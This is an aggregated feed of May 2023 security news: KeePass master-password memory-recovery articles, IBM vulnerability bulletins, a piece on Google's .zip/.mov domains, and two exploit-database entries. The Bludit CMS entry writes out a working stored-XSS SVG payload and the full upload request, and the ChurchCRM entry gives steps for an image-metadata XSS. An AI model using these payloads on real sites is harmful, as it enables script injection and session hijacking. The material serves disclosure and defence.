A proof-of-concept (PoC) has been made available for a security flaw impacting the KeePass password manager that could be exploited to recover a victim's master password in cleartext under specific circumstances.
The issue, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS, and is expected to be patched in version 2.54, which is likely to be released early

Password Security / Exploit

A proof-of-concept (PoC) has been made available for a security flaw impacting the KeePass password manager that could be exploited to recover a victim's master password in cleartext under specific circumstances.

The issue, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS, and is expected to be patched in version 2.54, which is likely to be released early next month.

"Apart from the first password character, it is mostly able to recover the password in plaintext," security researcher "vdhoney," who discovered the flaw and devised a PoC, said. "No code execution on the target system is required, just a memory dump."

"It doesn't matter where the memory comes from," the researcher added, stating, "it doesn't matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it's been since then."

It's worth noting that successful exploitation of the flaw banks on the condition that an attacker has already compromised a potential target's computer. It also requires that the password is typed on a keyboard, and not copied from a clipboard.

vdhoney said the vulnerability has to do with how a custom text box field used for entering the master password handles user input. Specifically, it has been found to leave traces of every character the user types in the program memory.

This leads to a scenario whereby an attacker could dump the program's memory and reassemble the password in plaintext with the exception of the first character. Users are advised to update to KeePass 2.54 once it becomes available.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

The disclosure comes a few months after another medium-severity flaw (CVE-2023-24055) was uncovered in the open source password manager that could be potentially exploited to retrieve cleartext passwords from the password database by leveraging write access to the software's XML configuration file.

KeePass has maintained that the "password database is not intended to be secure against an attacker who has that level of access to the local PC."

It also follows findings from Google security research that detailed a flaw in password managers such as Bitwarden, Dashlane, and Safari, which can be abused to auto-fill saved credentials into untrusted web pages, leading to possible account takeovers.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

KeePass Exploit Allows Attackers to Recover Master Passwords from Memory

IBM InfoSphere Information Server 11.7 is affected by a remote code execution vulnerability due to insecure deserialization in an RMI service.  IBM X-Force ID:  255285.

  

**Summary**

A remote code execution vulnerability in IBM InfoSphere Information Server was addressed.

**Vulnerability Details**

**CVEID:**   CVE-2023-32336  
**DESCRIPTION:**   IBM InfoSphere Information Server is affected by a remote code execution vulnerability due to insecure deserialization in an RMI service.  
CVSS Base score: 8.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255285 for the current score.  
CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

InfoSphere Information Server

11.7

  

**Remediation/Fixes**

None. See Workarounds and Mitigations section.

**Workarounds and Mitigations**

Change your Java configuration to limit the objects that will be handled by the RMI service.  
See technote for details.

**References**

Off

**Change History**

19 May 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSZJPZ","label":"IBM InfoSphere Information Server"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"}\],"Version":"11.7","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-32336: Security Bulletin: IBM InfoSphere Information Server is affected by a remote code execution vulnerability (CVE-2023-32336)

Categories: News
Tags: Week in security

Tags:  May 2023

The most interesting security-related news of the week from May 15-21.



(Read more...)




The post A week in security (May 15-21) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (May 15-21)

An issue was discovered in hledger before 1.23. A Stored Cross-Site Scripting (XSS) vulnerability exists in toBloodhoundJson that allows an attacker to execute JavaScript by encoding user-controlled values in a payload with base64 and parsing them with the atob function.

**Capital gains report,  
separate symbol/number display,  
command line commodity styling,  
budget selection,  
weekday/weekend recurrence,  
10% speedup,  
fixes.**

Release notes: https://hledger.org/release-notes.html#hledger-1-23

This release may be packaged for your system: check https://hledger.org/download.html#binary-packages. Or, you can try the binaries built by our github CI setup, below. Notes:

*   Download and unzip the appropriate "hledger-PLATFORM.zip" file below. This will unpack 2 or 3 hledger binaries into the current directory. On mac and unix machines, you will need to chmod +x these files to make them executable.
    
*   Windows binaries are built on Windows Server 2019. There is no hledger-ui binary for Windows.
    
*   Mac binaries are built on macos 10.15 catalina. You will need to mark them as trusted before you can run them: run open . to view the current folder in Finder; control-click hledger; option-click "Open"; allow running it.
    
*   Linux binaries are static and should run on most GNU/Linux machines with x64 or (when provided) arm32v7 architecture.

CVE-2021-46888: Release 1.23 · simonmichael/hledger

While the company’s new top-level domains could be used in phishing attacks, security researchers are divided on how big of a problem they really pose.

At the beginning of May, Google released eight new top-level domains (TLDs)—the suffixes at the end of URLs, like “.com” or “.uk.” These little addendums were developed decades ago to expand and organize URLs, and over the years, the nonprofit Internet Corporation for Assigned Names and Numbers (ICANN) has loosened restrictions on TLDs so organizations like Google can bid to sell access to more of them. But while Google's announcement included light-hearted offerings like “.dad” and “.nexus,” it also debuted a pair of TLDs that are uniquely poised to invite phishing and other types of online scamming: “.zip” and “.mov”.

The two stand out because they are also common file extension names. The former, .zip, is ubiquitous for data compression, while .mov is a video format developed by Apple. The concern, which is already starting to play out, is that URLs that look like file names will open up even more possibilities for digital scams like phishing that trick web users into clicking on malicious links that are masquerading as something legitimate. And the two domains could also expand the problem of programs mistakenly recognizing file names as URLs and automatically adding links to the file names. With this in mind, scammers could strategically buy .zip and .mov URLs that are also common file names—think, springbreak23.mov—so online references to a file with that name could automatically link to a malicious website.

“Attackers will use whatever they can to get inside an organization,” says Ronnie Tokazowski, a longtime phishing researcher and principal threat adviser at the cybersecurity firm Cofense. “Man, this all goes back a long time now. Nothing has changed.”

Researchers have already started seeing malicious actors buying up strategic .zip URLs and begin testing them in phishing campaigns. But reactions are mixed on how much of a negative impact .zip and .mov domains will have when scams that prey on URL confusion are already an inveterate threat. Additionally, proxies and other traffic management tools already deploy anti-phishing protections to cut down on the risks if users mis-click—and .zip and .mov will simply be incorporated into those defenses.

“The risk of confusion between domain names and file names is not a new one. For example, 3M’s Command products use the domain name command.com, which is also an important program on MS DOS and early versions of Windows,” Google told WIRED in a statement. “Applications have mitigations for this (such as Google Safe Browsing), and these mitigations will hold true for TLD’s such as .zip.” The company added that Google Registry already includes mechanisms to suspend or remove malicious domains across all of the company's top-level domains. “We will continue to monitor the usage of .zip and other TLDs, and if new threats emerge we will take appropriate action to protect users,” the company said.

Offering more TLDs broadens the number of URLs that are available to people. This means you have more choices and don't necessarily have to pay a premium to buy the site name you want from an existing owner or speculator who bought up a bunch of historic URLs. And some in the security community feel that, given the already extensive risk of phishing attacks, additions like .zip and .mov add negligible additional danger.

“I don't agree with the assertion that the new TLDs will increase the effectiveness of phishing in any meaningful way—primarily because people are already so easily fooled by URLs,” says security researcher Troy Hunt, who runs the breach-tracking service HaveIBeenPwned. “Not only can we, myself included, not tell the difference between so many ambiguous characters, we also usually have no idea what the correct URL is for many services. I bet you this all blows over before you know it with no incidents of consequence.”

Some researchers feel strongly, though, that a company like Google, which invests so much in anti-scam and anti-phishing work, could have simply opted not to offer these particular TLDs. Even if other top-level domains exist that are also file extensions, they argue that the world doesn't need more of these overlaps.

“Nobody said this was new. In fact, half the issue is that it’s not new,” says security researcher Marcus Hutchins. “We’ve had this issue in the past, and Google has just gone and caused the same problem again. It really seems like they created a big usability and security issue for downstream providers to clean up, all for no reason other than a low-effort money grab.”

The Real Risks in Google’s New .Zip and .Mov Domains

IBM InfoSphere Information Server 11.7 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  IBM X-Force ID:  251213.

  

**Summary**

A stored cross-site scripting vulnerability in InfoSphere Information Server was addressed.

**Vulnerability Details**

**CVEID:**   CVE-2023-28529  
**DESCRIPTION:**   IBM InfoSphere Information Server is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/251213 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

InfoSphere Information Server

11.7

**Remediation/Fixes**

**Product**

**VRMF**

**APAR**

**Remediation**

InfoSphere Information Server, InfoSphere Information Server on Cloud

11.7

DT197304

\--Apply IBM InfoSphere Information Server version 11.7.1.0  
\--Apply InfoSphere Information Server version 11.7.1.4  
\--Apply InfoSphere Information Server  11.7.1.4 Service pack 1

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

17 May 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSZJPZ","label":"IBM InfoSphere Information Server"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"}\],"Version":"11.7","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-28529: Security Bulletin: IBM InfoSphere Information Server is vulnerable to stored cross-site scripting (CVE-2023-28529)

IBM MQ 8.0, 9.0, and 9.1 could allow a local user to obtain sensitive credential information when a detailed technical error message is returned in a stack trace.  IBM X-Force ID:  250398.

**Security Bulletin**

  

**Summary**

An issue was identified with IBM MQ tracing logic that meant under certain circumstances sensitive data could be captured while IBM MQ trace was running. This data would be stored in plain text within the IBM MQ trace files.

**Vulnerability Details**

**CVEID:**   CVE-2023-28514  
**DESCRIPTION:**   IBM MQ could allow a local user to obtain sensitive credential information when a detailed technical error message is returned in a stack trace.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/250398 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM MQ

8.0

IBM MQ

9.0 LTS

IBM MQ

9.1 CD

IBM MQ

9.1 LTS

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

26 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Type":"MASTER","Line of Business":{"code":"LOB45","label":"Automation"},"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSYHRD","label":"IBM MQ"},"ARM Category":\[{"code":"a8m0z00000008MzAAI","label":"Security"}\],"ARM Case Number":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF010","label":"HP-UX"},{"code":"PF012","label":"IBM i"},{"code":"PF016","label":"Linux"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"}\],"Version":"8.0.0;9.0.0;9.1.0"}\]

CVE-2023-28514: Security Bulletin: IBM MQ is affected by a sensitive information disclosure vulnerability (CVE-2023-28514)

ChurchCRM version 4.5.4 suffers from a cross site scripting vulnerability. Related CVE number: CVE-2023-31699.

    # Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)# Date: 2023-04-17# Exploit Author: Rahad Chowdhury# Vendor Homepage: http://churchcrm.io/# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4# Version: 4.5.4# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-31699Steps to Reproduce:1. At first login your admin panel.2. Then click "Admin" menu and click "CSV Import" and you will get CSV fileuploder option.3. now insert xss payload in jpg file using exiftool or from imageproperties and then upload the jpg file.4. you will see XSS pop up.

ChurchCRM 4.5.4 Cross Site Scripting

Bludit CMS version 3.14.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS)(Authenticated)# Date: 2023-04-15# Exploit Author: Rahad Chowdhury# Vendor Homepage: https://www.bludit.com/# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1# Version: 3.14.1# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-31698SVG Payload-------------<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>save this SVG file xss.svgSteps to Reproduce:1. At first login your admin panel.2. then go to setting and click logo section.3. Now upload xss.svg file so your request data will bePOST /bludit/admin/ajax/logo-upload HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/112.0Content-Type: multipart/form-data;boundary=---------------------------15560729415644048492005010998Referer: http://127.0.0.1/bludit/admin/settingsCookie: BLUDITREMEMBERUSERNAME=admin;BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74iContent-Length: 651-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="tokenCSRF"626c201693546f472cdfc11bed0938aab8c6e480-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="inputFile"; filename="xss.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>-----------------------------15560729415644048492005010998--4. Now open logo image link that you upload. You will see XSS pop up.

Bludit CMS 3.14.1 Cross Site Scripting

A newly discovered bug in the open source password manager, if exploited, lets attackers retrieve a target's master password — and proof-of-concept code is available.

For the second time in recent months a security researcher has discovered a vulnerability in the widely used KeePass open source password manager.

This one affects KeePass 2.X versions for Windows, Linux, and macOS, and gives attackers a way to retrieve a target's master password in cleartext from a memory dump — even when the user's workspace is closed.

While KeePass' maintainer has developed a fix for the flaw, it won't become generally available until the release of version 2.54 (likely in early June). Meanwhile, the researcher who discovered the vulnerability — tracked as CVE-2023-32784 — has already released a proof-of-concept for it on GitHub.

"No code execution on the target system is required, just a memory dump," the security researcher "vdhoney" said on GitHub. "It doesn't matter where the memory comes from — can be the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system."

An attacker can retrieve the master password even if the local user has locked the workspace and even after KeePass is no longer running, the researcher said.

Vdhoney described the vulnerability as one that only an attacker with read access to the host's filesystem or RAM would be able to exploit. Often, however, that does not require an attacker to have physical access to a system. Remote attackers routinely gain such access these days via vulnerability exploits, phishing attacks, remote access Trojans, and other methods.

"Unless you expect to be specifically targeted by someone sophisticated, I would keep calm," the researcher added.

Vdhoney said the vulnerability had to do with how a KeyPass custom box for entering passwords called "SecureTextBoxEx" processes user input. When the user types a password, there are leftover strings that allow an attacker to reassemble the password in cleartext, the researcher said. "For example, when 'Password' is typed, it will result in these leftover strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d."

**Patch in Early June**

In a discussion thread on SourceForge, KeePass maintainer Dominik Reichl acknowledged the issue and said he had implemented two enhancements to the password manager to address the problem.

The enhancements will be included in the next KeePass release (2.54), along with other security-related features, Reichel said. He initially indicated that would happen sometime in the next two months, but later revised the estimate delivery date for the new version to early June.

"To clarify, 'within the next two months' was meant as an upper bound," Reichl said. "A realistic estimate for the KeePass 2.54 release probably is 'in the beginning of June' (i.e. 2-3 weeks), but I cannot guarantee that."

**Questions About Password Manager Security**

For KeePass users, this is the second time in recent months that researchers have uncovered a security issue with the software. In February, researcher Alex Hernandez showed how an attacker with write access to KeePass' XML configuration file could edit it in a manner as to retrieve cleartext passwords from the password database and export it silently to an attacker-controlled server.

Though the vulnerability was assigned a formal identifier (CVE-2023-24055), KeePass itself disputed that description and maintained the password manager is not designed to withstand attacks from someone that already has a high level of access on a local PC.

"No password manager is safe to use when the operating environment is compromised by a malicious actor," KeePass had noted at the time. "For most users, a default installation of KeePass is safe when running on a timely patched, properly managed, and responsibly used Window environment."

The new KeyPass vulnerability is likely to keep discussions around password manager security alive for some more time. In recent months, there have several incidents that have highlighted security issues related to major password manager technologies. In December, for instance, LastPass disclosed an incident where a threat actor, using credentials from a previous intrusion at the company, accessed customer data stored with a third-party cloud service provider.

In January, researchers at Google warned about password managers such as Bitwarden, Dashlane, and Safari Password Manager auto-filling user credentials without any prompting into untrusted pages.

Threat actors meanwhile have ramped up attacks against password manager products, likely as a result of such issues.

In January, Bitwarden and 1Password reported observing paid advertisements in Google search results that directed users who opened the ads to sites for downloading spoofed versions of their password managers.

Tag

#windows